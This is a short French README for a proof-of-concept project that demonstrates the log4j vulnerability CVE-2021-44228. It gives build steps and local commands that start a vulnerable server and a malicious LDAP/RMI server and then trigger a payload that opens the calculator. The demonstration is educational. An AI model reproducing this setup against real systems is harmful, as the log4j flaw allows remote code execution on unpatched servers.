
projet de démonstration pour illustrer comment exploiter la vulnérabilité log4j (CVE-2021-44228)
projets de démonstration pour illustrer comment exécuter la vulnérabilité log4j (CVE-2021-44228)
a utilisé Spring Boot juste pour une mise en place rapide. veuillez excuser tout le code en dur, ce n'était qu'une POC.
Avoir Java 8 installé. Construire avec Maven mvn clean package -DskipTests. Exécuter ces commandes dans des fenêtres de terminal séparées :
java -jar vulnerable-server/target/vulnerable-server.jar
java -jar malicious-server/target/malicious-server.jar
curl http://localhost:8880/victimLDAP
curl http://localhost:8880/victimRMI
Ceci devrait exécuter le code dans la classe Exploit (qui ouvrira simplement la calculatrice)